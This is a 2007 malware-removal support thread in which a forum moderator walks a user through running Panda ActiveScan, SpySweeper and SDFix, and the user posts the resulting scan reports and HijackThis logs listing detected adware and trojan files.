Group: Moderators
Posts: 8,645
Joined: 12-April 05
Member No.: 1,352
Uninstall spyware nuker. If you don't see it in add/remove programs don't worry about it.

Your computer is still pretty bad. Lets run a few more tools.

Run Panda Activescan from Here.

Once you are on the Panda site click the Scan your PC button
- A new window will open...click the Check Now button
- Enter your Country
- Enter your State/Province
- Enter your e-mail address and click send
- Select either Home User or Company
- Click the big Scan Now button
- If it wants to install an ActiveX component allow it
- It will start downloading the files it requires for the scan
(Note: It may take a couple of minutes)
- When the download is complete, click on Local Disks to start the scan
- When the scan completes, if anything malicious is detected, click the See Report button, then Save Report and save it to a convenient location so you can post it back.

---------

Please download WebRoot SpySweeper from HERE (It's a 14 day trial):
  • Click the Download now link on the right to download the program.
  • Double-click the file to install it as follows:
  • Click "Next", read the agreement, Click "Next"
  • Choose "Custom" click "Next".
  • Leave the default installation directory as it is, then click "Next".
  • UNcheck "Run SpySweeper at Windows Startup" and "Add Sweep for Spyware to Windows Explorer Context Menu". Click "Next".
  • On the following screen you can leave the e-mail address field blank, if you wish. Click "Next".
  • Finally, click "Install"
  • Once the program is installed, it will open.
  • It will prompt you to update to the latest definitions, click Yes.
  • Once the definitions are installed, disconnect from the internet.
  • Click Options on the left side.
  • Click the Sweep Options tab.
  • Under What to Sweep please put a check next to the following:
  • Sweep Memory
  • Sweep Registry
  • Sweep Cookies
  • Sweep All User Accounts
  • Enable Direct Disk Sweeping
  • Sweep Contents of Compressed Files
  • Sweep for Rootkits
  • Please UNCHECK Do not Sweep System Restore Folder.
  • Click Sweep Now on the left side.
  • Click the Start button.
  • When it's done scanning, click the Next button.
  • Make sure everything has a check next to it, then click the Next button.
  • It will remove all of the items found.
  • Click Session Log in the upper right corner, copy everything in that window.
  • Click the Summary tab and click Finish.
  • Paste the contents of the session log you copied into your next reply.
Post the webroot log and a new hijackthis log along with the panda log.


--------------------
Having problems with spyware and viruses? If so then please follow the Spyware Removal Guide

Want to know how to protect your clean computer from viruses and spyware? The please follow the Malware Prevention Guide

Looking for good free security software?(or other great free stuff) The please take a look at the Recommended Security Applications Guide
Go to the top of the page
 
+Quote Post
Buchi
post Feb 10 2007, 07:33 AM
Post #10


Member
**

Group: Members
Posts: 16
Joined: 4-February 07
Member No.: 10,964
I USED THE TWO TOOLS AND BELOW ARE THE REPORTS:
IT SEEMS MY SYSTEM IS DAMAGED VERY BADLY ohmy.gif , THANKS FOR HELP rolleyes.gif .

1) PANDA REPORT:

Incident Status Location

Adware:adware/ipinsight Not disinfected c:\windows\system32\sentry.sys
Adware:adware/powerstrip Not disinfected Windows Registry
Virus:Trj/Mailbot.BJ Disinfected C:\Documents and Settings\Sys\3.exe
Spyware:Cookie/YieldManager Not disinfected C:\Documents and Settings\Sys\Cookies\sys@ad.yieldmanager[2].txt
Spyware:Cookie/Atlas DMT Not disinfected C:\Documents and Settings\Sys\Cookies\sys@atdmt[1].txt
Spyware:Cookie/Bluestreak Not disinfected C:\Documents and Settings\Sys\Cookies\sys@bluestreak[1].txt
Spyware:Cookie/Casalemedia Not disinfected C:\Documents and Settings\Sys\Cookies\sys@casalemedia[2].txt
Spyware:Cookie/Doubleclick Not disinfected C:\Documents and Settings\Sys\Cookies\sys@doubleclick[1].txt
Spyware:Cookie/FastClick Not disinfected C:\Documents and Settings\Sys\Cookies\sys@fastclick[2].txt
Spyware:Cookie/FastClick Not disinfected C:\Documents and Settings\Sys\Cookies\sys@media.fastclick[1].txt
Spyware:Cookie/Tribalfusion Not disinfected C:\Documents and Settings\Sys\Cookies\sys@tribalfusion[1].txt
Potentially unwanted tool:Application/Processor Not disinfected C:\Documents and Settings\Sys\Desktop\BMK\SmitfraudFix\Process.exe
Potentially unwanted tool:Application/Processor Not disinfected C:\Documents and Settings\Sys\Desktop\BMK\SmitfraudFix\SmitfraudFix\Process.exe
Potentially unwanted tool:Application/Processor Not disinfected C:\Documents and Settings\Sys\Desktop\SmitfraudFix.zip[SmitfraudFix/Process.exe]
Potentially unwanted tool:Application/Processor Not disinfected C:\Documents and Settings\Sys\Desktop\SPYWARE\SmitFraudFix\SmitfraudFix\Process.exe
Adware:Adware/Aureate-Radiate Not disinfected C:\WINDOWS\system32\GMAGlue.exe
Virus:W32/Sdbot.ftp.worm Disinfected C:\WINDOWS\system32\i
Potentially unwanted tool:Application/Processor Not disinfected C:\WINDOWS\system32\Process.exe
Adware:Adware/Aureate-Radiate Not disinfected D:\Program Files\Group Mail\BACKUP\GMAGlue.exe
Adware:Adware/Aureate-Radiate Not disinfected D:\Program Files\Group Mail\BACKUP\GMAGlue.001
Adware:Adware/Aureate-Radiate Not disinfected F:\Zip\Group Mail Plus v3.4.071 with serial\infactagmplus.exe[GMAGLUE.EXE]


2) SPY SWEEPER REPORT:
12:52 PM: Removal process completed. Elapsed time 00:00:07
12:52 PM: Quarantining All Traces: burstnet cookie
12:52 PM: Quarantining All Traces: tribalfusion cookie
12:52 PM: Quarantining All Traces: bluestreak cookie
12:52 PM: Quarantining All Traces: atlas dmt cookie
12:52 PM: Quarantining All Traces: casalemedia cookie
12:52 PM: Quarantining All Traces: yieldmanager cookie
12:51 PM: Quarantining All Traces: maxifiles
12:51 PM: Removal process initiated
12:51 PM: Traces Found: 8
12:51 PM: Custom Sweep has completed. Elapsed time 00:17:26
12:51 PM: File Sweep Complete, Elapsed Time: 00:14:57
12:50 PM: ApplicationMinimized - EXIT
12:50 PM: ApplicationMinimized - EXIT
12:50 PM: ApplicationMinimized - ENTER
12:50 PM: ApplicationMinimized - ENTER
12:50 PM: Warning: TCompressedFile.GetStreams(1): Stream read error
12:45 PM: Warning: SweepDirectories: Cannot find directory "g:". This directory was not added to the list of paths to be scanned.
12:39 PM: Warning: Failed to open file "c:\program files\escan\spooler.lck". The operation completed successfully
12:39 PM: Warning: Failed to open file "c:\program files\escan\maildisp.lck". The operation completed successfully
12:39 PM: Warning: Failed to open file "c:\program files\escan\maildsp1.lck". The operation completed successfully
12:36 PM: Starting File Sweep
12:36 PM: Warning: SweepDirectories: Cannot find directory "a:". This directory was not added to the list of paths to be scanned.
12:36 PM: Cookie Sweep Complete, Elapsed Time: 00:00:00
12:36 PM: c:\documents and settings\sys\cookies\sys@www.burstnet[1].txt (ID = 2337)
12:36 PM: Found Spy Cookie: burstnet cookie
12:36 PM: c:\documents and settings\sys\cookies\sys@tribalfusion[1].txt (ID = 3589)
12:36 PM: Found Spy Cookie: tribalfusion cookie
12:36 PM: c:\documents and settings\sys\cookies\sys@casalemedia[2].txt (ID = 2354)
12:36 PM: c:\documents and settings\sys\cookies\sys@bluestreak[1].txt (ID = 2314)
12:36 PM: Found Spy Cookie: bluestreak cookie
12:36 PM: c:\documents and settings\sys\cookies\sys@atdmt[1].txt (ID = 2253)
12:36 PM: Found Spy Cookie: atlas dmt cookie
12:36 PM: c:\documents and settings\sys\cookies\sys@as.casalemedia[1].txt (ID = 2355)
12:36 PM: Found Spy Cookie: casalemedia cookie
12:36 PM: c:\documents and settings\sys\cookies\sys@ad.yieldmanager[2].txt (ID = 3751)
12:36 PM: Found Spy Cookie: yieldmanager cookie
12:36 PM: Starting Cookie Sweep
12:36 PM: Registry Sweep Complete, Elapsed Time:00:00:22
12:36 PM: HKLM\software\microsoft\juan\ (ID = 1781228)
12:36 PM: Found Adware: maxifiles
12:35 PM: Starting Registry Sweep
12:35 PM: Memory Sweep Complete, Elapsed Time: 00:01:35
12:34 PM: Starting Memory Sweep
12:34 PM: Start Custom Sweep
12:34 PM: Sweep initiated using definitions version 845
12:29 PM: Access to Hosts file allowed for D:\PROGRAM FILES\AVG ANTI-SPYWARE 7.5\AVGAS.EXE
12:26 PM: There is a problem reaching the server. The cause may be in your connection, or on the server. Please try again later.
12:26 PM: ApplicationMinimized - EXIT
12:26 PM: ApplicationMinimized - ENTER
Keylogger: Off
BHO Shield: On
IE Security Shield: On
Alternate Data Stream (ADS) Execution Shield: On
Startup Shield: On
Common Ad Sites: Off
Hosts File Shield: On
Internet Communication Shield: On
ActiveX Shield: On
Windows Messenger Service Shield: On
IE Favorites Shield: On
Spy Installation Shield: On
Memory Shield: Off
IE Hijack Shield: On
IE Tracking Cookies Shield: Off
12:25 PM: Shield States
12:25 PM: Spyware Definitions: 845
12:24 PM: Spy Sweeper 5.3.1.2344 started
12:24 PM: Spy Sweeper 5.3.1.2344 started
12:24 PM: | Start of Session, Saturday, February 10, 2007 |
***************

3) NEW HIJACKTHIS LOG:
Logfile of HijackThis v1.99.1
Scan saved at 1:00:52 PM, on 2/10/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\System32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
D:\Program Files\AVG Anti-Spyware 7.5\guard.exe
C:\PROGRA~1\eScan\TRAYSSER.EXE
C:\PROGRA~1\eScan\avpm.exe
C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
C:\PROGRA~1\COMMON~1\MICROW~1\Agent\MWASER.EXE
C:\WINDOWS\system32\Ati2evxx.exe
C:\PROGRA~1\COMMON~1\MICROW~1\Agent\MWAgent.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\System32\PAStiSvc.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Webroot\Spy Sweeper\SpySweeper.exe
C:\WINDOWS\sm56hlpr.exe
C:\WINDOWS\RTHDCPL.EXE
C:\Program Files\GlobespanVirata\Adsl\dslstat.exe
C:\Program Files\GlobespanVirata\Adsl\dslagent.exe
C:\Program Files\Adobe\Photoshop Album Starter Edition\3.0\Apps\apdproxy.exe
C:\Program Files\Common Files\Real\Update_OB\realsched.exe
C:\PROGRA~1\eScan\TRAYICOS.EXE
C:\PROGRA~1\eScan\MAILDISP.EXE
C:\PROGRA~1\eScan\AVPMWrap.EXE
C:\PROGRA~1\eScan\MAILSCAN.EXE
C:\PROGRA~1\ESCAN\SPOOLER.EXE
C:\PROGRA~1\eScan\kavss.exe
D:\Program Files\AVG Anti-Spyware 7.5\avgas.exe
C:\WINDOWS\System32\ctfmon.exe
C:\Program Files\Messenger\msmsgs.exe
C:\PROGRA~1\eScan\AvpM.exe
C:\Program Files\Google\GoogleToolbarNotifier\1.2.908.8472\GoogleToolbarNotifier.exe
C:\PROGRA~1\Yahoo!\MESSEN~1\ymsgr_tray.exe
D:\Program Files\Skype\Phone\Skype.exe
D:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe
C:\Program Files\SAMSUNG\Samsung Multimedia Keyboard\gpkbd.exe
C:\Program Files\Webroot\Spy Sweeper\SpySweeperUI.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Webroot\Spy Sweeper\SSU.EXE
C:\Program Files\Internet Explorer\iexplore.exe
C:\HIJACKTHIS\HijackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = about:
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.google.com
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://www.google.com/ie
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.google.com
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.google.co.in/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = about:
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.google.com/ie
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Bar = http://www.google.com/ie
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.google.com
R1 - HKCU\Software\Microsoft\Internet Explorer\Search,SearchAssistant = http://www.google.com/ie
R1 - HKLM\Software\Microsoft\Internet Explorer\Search,Default_Search_URL = http://www.google.com/ie
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant = http://www.google.com/ie
R1 - HKCU\Software\Microsoft\Internet Explorer\SearchURL,(Default) = http://www.google.com/search?q=%s
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page =
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page =
R1 - HKCU\Software\Microsoft\Internet Connection Wizard,ShellNext = iexplore
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
R3 - URLSearchHook: Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - (no file)
O2 - BHO: DAPHelper Class - {0000CC75-ACF3-4cac-A0A9-DD3868E06852} - D:\Program Files\DAP\DAPBHO.dll
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
O2 - BHO: (no name) - {481E7983-1F2B-4250-951A-44E0902DF978} - (no file)
O2 - BHO: Yahoo! IE Services Button - {5BAB4B5B-68BC-4B02-94D6-2FC0DE4A7897} - C:\Program Files\Yahoo!\Common\yiesrvc.dll
O2 - BHO: (no name) - {68D5CF1D-EC5C-4bdd-A9EF-F0E517565D50} - (no file)
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.5.0_08\bin\ssv.dll
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar2.dll
O2 - BHO: (no name) - {F2496031-4FE4-497E-8F75-04E0A180366E} - C:\WINDOWS\System32\vtsqn.dll (file missing)
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O3 - Toolbar: DAP Bar - {62999427-33FC-4baf-9C9C-BCE6BD127F08} - D:\Program Files\DAP\DAPIEBar.dll
O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar2.dll
O4 - HKLM\..\Run: [SMSERIAL] sm56hlpr.exe
O4 - HKLM\..\Run: [RTHDCPL] RTHDCPL.EXE
O4 - HKLM\..\Run: [Alcmtr] ALCMTR.EXE
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [DSLSTATEXE] "C:\Program Files\GlobespanVirata\Adsl\dslstat.exe" icon
O4 - HKLM\..\Run: [DSLAGENTEXE] "C:\Program Files\GlobespanVirata\Adsl\dslagent.exe"
O4 - HKLM\..\Run: [Adobe Photo Downloader] "C:\Program Files\Adobe\Photoshop Album Starter Edition\3.0\Apps\apdproxy.exe"
O4 - HKLM\..\Run: [TkBellExe] "C:\Program Files\Common Files\Real\Update_OB\realsched.exe" -osboot
O4 - HKLM\..\Run: [john315] C:\WINDOWS\system32\srrvc.exe
O4 - HKLM\..\Run: [MailScan Dispatcher] "C:\Program Files\eScan\LAUNCH.EXE"
O4 - HKLM\..\Run: [eScan Updater] "C:\PROGRA~1\eScan\TRAYICOS.EXE" /App
O4 - HKLM\..\Run: [eScan Monitor] C:\PROGRA~1\eScan\AVPMWrap.EXE
O4 - HKLM\..\Run: [staeck12] C:\WINDOWS\system32\mfcee.exe
O4 - HKLM\..\Run: [melg34] C:\WINDOWS\system32\mdmd.exe
O4 - HKLM\..\Run: [!AVG Anti-Spyware] "D:\Program Files\AVG Anti-Spyware 7.5\avgas.exe" /minimized
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\System32\ctfmon.exe
O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs.exe" /background
O4 - HKCU\..\Run: [Yahoo! Pager] "C:\PROGRA~1\Yahoo!\MESSEN~1\YAHOOM~1.EXE" -quiet
O4 - HKCU\..\Run: [swg] "C:\Program Files\Google\GoogleToolbarNotifier\1.2.908.8472\GoogleToolbarNotifier.exe"
O4 - HKCU\..\Run: [Skype] "D:\Program Files\Skype\Phone\Skype.exe" /nosplash /minimized
O4 - HKCU\..\Run: [john315] C:\WINDOWS\system32\srrvc.exe
O4 - HKCU\..\Run: [staeck12] C:\WINDOWS\system32\mfcee.exe
O4 - HKCU\..\Run: [melg34] C:\WINDOWS\system32\mdmd.exe
O4 - HKCU\..\Run: [SUPERAntiSpyware] "D:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe"
O4 - Global Startup: Adobe Gamma Loader.lnk = C:\Program Files\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe
O4 - Global Startup: Adobe Reader Speed Launch.lnk = C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe
O4 - Global Startup: Samsung Multimedia Keyboard.lnk = ?
O8 - Extra context menu item: &Download with &DAP - D:\PROGRA~1\DAP\dapextie.htm
O8 - Extra context menu item: &Yahoo! Search - file:///C:\Program Files\Yahoo!\Common/ycsrch.htm
O8 - Extra context menu item: Advanced Email Extractor - res://D:\Program%20Files\Advanced%20Email%20Extractor\AeeMsie.dll/page.html
O8 - Extra context menu item: Download &all with DAP - D:\PROGRA~1\DAP\dapextie2.htm
O8 - Extra context menu item: E&xport to Microsoft Excel - res://D:\PROGRA~1\MICROS~1\OFFICE11\EXCEL.EXE/3000
O8 - Extra context menu item: Scan link with AEE - res://D:\Program%20Files\Advanced%20Email%20Extractor\AeeMsie.dll/link.html
O8 - Extra context menu item: Yahoo! &Dictionary - file:///C:\Program Files\Yahoo!\Common/ycdict.htm
O8 - Extra context menu item: Yahoo! &Maps - file:///C:\Program Files\Yahoo!\Common/ycmap.htm
O8 - Extra context menu item: Yahoo! &SMS - file:///C:\Program Files\Yahoo!\Common/ycsms.htm
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0_08\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0_08\bin\ssv.dll
O9 - Extra button: Yahoo! Services - {5BAB4B5B-68BC-4B02-94D6-2FC0DE4A7897} - C:\Program Files\Yahoo!\Common\yiesrvc.dll
O9 - Extra button: Run DAP - {669695BC-A811-4A9D-8CDF-BA8C795F261C} - D:\PROGRA~1\DAP\DAP.EXE
O9 - Extra button: (no name) - {85d1f590-48f4-11d9-9669-0800200c9a66} - %windir%\bdoscandel.exe (file missing)
O9 - Extra 'Tools' menuitem: Uninstall BitDefender Online Scanner v8 - {85d1f590-48f4-11d9-9669-0800200c9a66} - %windir%\bdoscandel.exe (file missing)
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - D:\PROGRA~1\MICROS~1\OFFICE11\REFIEBAR.DLL
O9 - Extra button: Email Extractor - {AFA7DB99-3E4D-4396-94F8-B0B135BCB472} - res://D:\Program%20Files\Advanced%20Email%20Extractor\AeeMsie.dll/page.html (file missing) (HKCU)
O9 - Extra 'Tools' menuitem: Advanced Email Extractor - {AFA7DB99-3E4D-4396-94F8-B0B135BCB472} - res://D:\Program%20Files\Advanced%20Email%20Extractor\AeeMsie.dll/page.html (file missing) (HKCU)
O10 - Unknown file in Winsock LSP: c:\windows\system32\mwtsp.dll
O10 - Unknown file in Winsock LSP: c:\windows\system32\mwtsp.dll
O10 - Unknown file in Winsock LSP: c:\windows\system32\mwtsp.dll
O16 - DPF: {30528230-99f7-4bb4-88d8-fa1d4f56a2ab} (YInstStarter Class) - C:\Program Files\Yahoo!\Common\yinsthelper.dll
O16 - DPF: {9A9307A0-7DA4-4DAF-B042-5009F29E09E1} (ActiveScan Installer Class) - http://acs.pandasoftware.com/activescan/as5free/asinst.cab
O17 - HKLM\System\CCS\Services\Tcpip\..\{17BBF687-1141-4522-B007-EF63C7F4B7EE}: NameServer = 202.54.6.60,202.54.29.5
O17 - HKLM\System\CCS\Services\Tcpip\..\{7A1DA16E-B943-4E3A-A5A8-FF298FFD2041}: NameServer = 202.54.29.5 202.54.6.60
O20 - Winlogon Notify: !SASWinLogon - D:\Program Files\SUPERAntiSpyware\SASWINLO.dll
O20 - Winlogon Notify: WRNotifier - C:\WINDOWS\SYSTEM32\WRLogonNTF.dll
O23 - Service: Ati HotKey Poller - ATI Technologies Inc. - C:\WINDOWS\System32\Ati2evxx.exe
O23 - Service: ATI Smart - Unknown owner - C:\WINDOWS\system32\ati2sgag.exe
O23 - Service: AVG Anti-Spyware Guard - Anti-Malware Development a.s. - D:\Program Files\AVG Anti-Spyware 7.5\guard.exe
O23 - Service: eScan Server-Updater (eScan-trayicos) - MicroWorld Technologies Inc. - C:\PROGRA~1\eScan\TRAYSSER.EXE
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe
O23 - Service: iPodService - Apple Computer, Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: eScan Monitor Service (KAVMonitorService) - Kaspersky Labs. - C:\PROGRA~1\eScan\avpm.exe
O23 - Service: MWAgent - MicroWorld Technologies Inc. - C:\PROGRA~1\COMMON~1\MICROW~1\Agent\MWASER.EXE
O23 - Service: STI Simulator - Unknown owner - C:\WINDOWS\System32\PAStiSvc.exe
O23 - Service: Webroot Spy Sweeper Engine (WebrootSpySweeperService) - Webroot Software, Inc. - C:\Program Files\Webroot\Spy Sweeper\SpySweeper.exe
Go to the top of the page
 
+Quote Post
Buchi
post Feb 10 2007, 10:57 AM
Post #11


Member
**

Group: Members
Posts: 16
Joined: 4-February 07
Member No.: 10,964
Besides I have one doubt, my internet connection has got invariably very slow after installing the spyware/adware softwares. If I open an additional window, the transferring of the bytes is getting completely stopped, so I have to restart my syste to browse internet. Any suggestion why is this happening? Can I un-install these softwares now? Please comment.
Go to the top of the page
 
+Quote Post
rridgely
post Feb 10 2007, 05:10 PM
Post #12


I hate computers
Group Icon

Group: Moderators
Posts: 8,645
Joined: 12-April 05
Member No.: 1,352
You can uninstall webroot spysweeper if you want. Keep the others because we will probably need them again.

Download SDFix and save it to your Desktop.

Double click SDFix.exe and it will extract the files to %systemdrive%
(Drive that contains the Windows Directory, typically C:\SDFix)

Please then reboot your computer in Safe Mode by doing the following :
  • Restart your computer
  • After hearing your computer beep once during startup, but before the Windows icon appears, tap the F8 key continually;
  • Instead of Windows loading as normal, the Advanced Options Menu should appear;
  • Select the first option, to run Windows in Safe Mode, then press Enter.
  • Choose your usual account.
  • Open the extracted SDFix folder and double click RunThis.bat to start the script.
  • Type Y to begin the cleanup process.
  • It will remove any Trojan Services and Registry Entries that it finds then prompt you to press any key to Reboot.
  • Press any Key and it will restart the PC.
  • When the PC restarts the Fixtool will run again and complete the removal process then display Finished, press any key to end the script and load your desktop icons.
  • Once the desktop icons load the SDFix report will open on screen and also save into the SDFix folder as Report.txt
    (Report.txt will also be copied to Clipboard ready for posting back on the forum).
  • Finally paste the contents of the Report.txt back on the forum with a new HijackThis log


--------------------
Having problems with spyware and viruses? If so then please follow the Spyware Removal Guide

Want to know how to protect your clean computer from viruses and spyware? The please follow the Malware Prevention Guide

Looking for good free security software?(or other great free stuff) The please take a look at the Recommended Security Applications Guide
Go to the top of the page
 
+Quote Post
Buchi
post Feb 11 2007, 07:00 AM
Post #13


Member
**

Group: Members
Posts: 16
Joined: 4-February 07
Member No.: 10,964
THANKS RRIDGELY, BELOW ARE THE REPORTS, PLEASE ADVISE NEXT STEP :

1) SDFix report:

SDFix: Version 1.64

Run by: Sys - Sun 02/11/2007 @ 12:19:12.87

Microsoft Windows XP [Version 5.1.2600]

Running From: C:\SDFix

Safe Mode:
Checking Services:

Name:

Path:


Restoring Windows Registry Entries
Restoring Default Hosts File


Rebooting...

Normal Mode:
Checking Files:

Below files will be copied to Backups folder then removed:

C:\WINDOWS\system32\eraseme_38347.exe - Deleted
C:\WINDOWS\system32\eraseme_46035.exe - Deleted
C:\WINDOWS\system32\eraseme_51380.exe - Deleted
C:\WINDOWS\system32\i - Deleted
C:\WINDOWS\system32\plscd.exe - Deleted
C:\WINDOWS\system32\setup_23367.exe - Deleted



ADS Check:

C:\WINDOWS\system32
No streams found.

Final Check:



Remaining Files:
---------------

Backups Folder: - C:\SDFix\backups\backups.zip


Checking For Files with Hidden Attributes :

C:\WINDOWS\system32\FC5303FB6F.sys
C:\WINDOWS\system32\KGyGaAvL.sys
C:\WINDOWS\LastGood.Tmp\INF\oem5.inf
C:\WINDOWS\LastGood.Tmp\INF\oem5.PNF

Finished

2) NEW HIJACKTHIS LOG:
Logfile of HijackThis v1.99.1
Scan saved at 12:27:02 PM, on 2/11/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\System32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
D:\Program Files\AVG Anti-Spyware 7.5\guard.exe
C:\PROGRA~1\eScan\TRAYSSER.EXE
C:\PROGRA~1\eScan\avpm.exe
C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
C:\PROGRA~1\COMMON~1\MICROW~1\Agent\MWASER.EXE
C:\PROGRA~1\COMMON~1\MICROW~1\Agent\MWAgent.exe
C:\WINDOWS\System32\PAStiSvc.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Webroot\Spy Sweeper\SpySweeper.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\sm56hlpr.exe
C:\WINDOWS\RTHDCPL.EXE
C:\Program Files\GlobespanVirata\Adsl\dslstat.exe
C:\Program Files\GlobespanVirata\Adsl\dslagent.exe
C:\Program Files\Adobe\Photoshop Album Starter Edition\3.0\Apps\apdproxy.exe
C:\Program Files\Common Files\Real\Update_OB\realsched.exe
C:\PROGRA~1\eScan\TRAYICOS.EXE
C:\PROGRA~1\eScan\AVPMWrap.EXE
C:\PROGRA~1\eScan\MAILDISP.EXE
C:\PROGRA~1\ESCAN\SPOOLER.EXE
C:\PROGRA~1\eScan\MAILSCAN.EXE
C:\PROGRA~1\eScan\kavss.exe
D:\Program Files\AVG Anti-Spyware 7.5\avgas.exe
C:\WINDOWS\System32\ctfmon.exe
C:\Program Files\Messenger\msmsgs.exe
C:\PROGRA~1\eScan\AvpM.exe
C:\Program Files\Google\GoogleToolbarNotifier\1.2.908.8472\GoogleToolbarNotifier.exe
C:\PROGRA~1\Yahoo!\MESSEN~1\ymsgr_tray.exe
D:\Program Files\Skype\Phone\Skype.exe
D:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe
C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe
C:\HIJACKTHIS\HijackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = about:
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.google.com
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://www.google.com/ie
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.google.com
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.google.co.in/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = about:
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.google.com/ie
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Bar = http://www.google.com/ie
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.google.com
R1 - HKCU\Software\Microsoft\Internet Explorer\Search,SearchAssistant = http://www.google.com/ie
R1 - HKLM\Software\Microsoft\Internet Explorer\Search,Default_Search_URL = http://www.google.com/ie
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant = http://www.google.com/ie
R1 - HKCU\Software\Microsoft\Internet Explorer\SearchURL,(Default) = http://www.google.com/search?q=%s
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page =
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page =
R1 - HKCU\Software\Microsoft\Internet Connection Wizard,ShellNext = iexplore
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
R3 - URLSearchHook: Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - (no file)
O2 - BHO: DAPHelper Class - {0000CC75-ACF3-4cac-A0A9-DD3868E06852} - D:\Program Files\DAP\DAPBHO.dll
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
O2 - BHO: (no name) - {481E7983-1F2B-4250-951A-44E0902DF978} - (no file)
O2 - BHO: Yahoo! IE Services Button - {5BAB4B5B-68BC-4B02-94D6-2FC0DE4A7897} - C:\Program Files\Yahoo!\Common\yiesrvc.dll
O2 - BHO: (no name) - {68D5CF1D-EC5C-4bdd-A9EF-F0E517565D50} - (no file)
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.5.0_08\bin\ssv.dll
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar2.dll
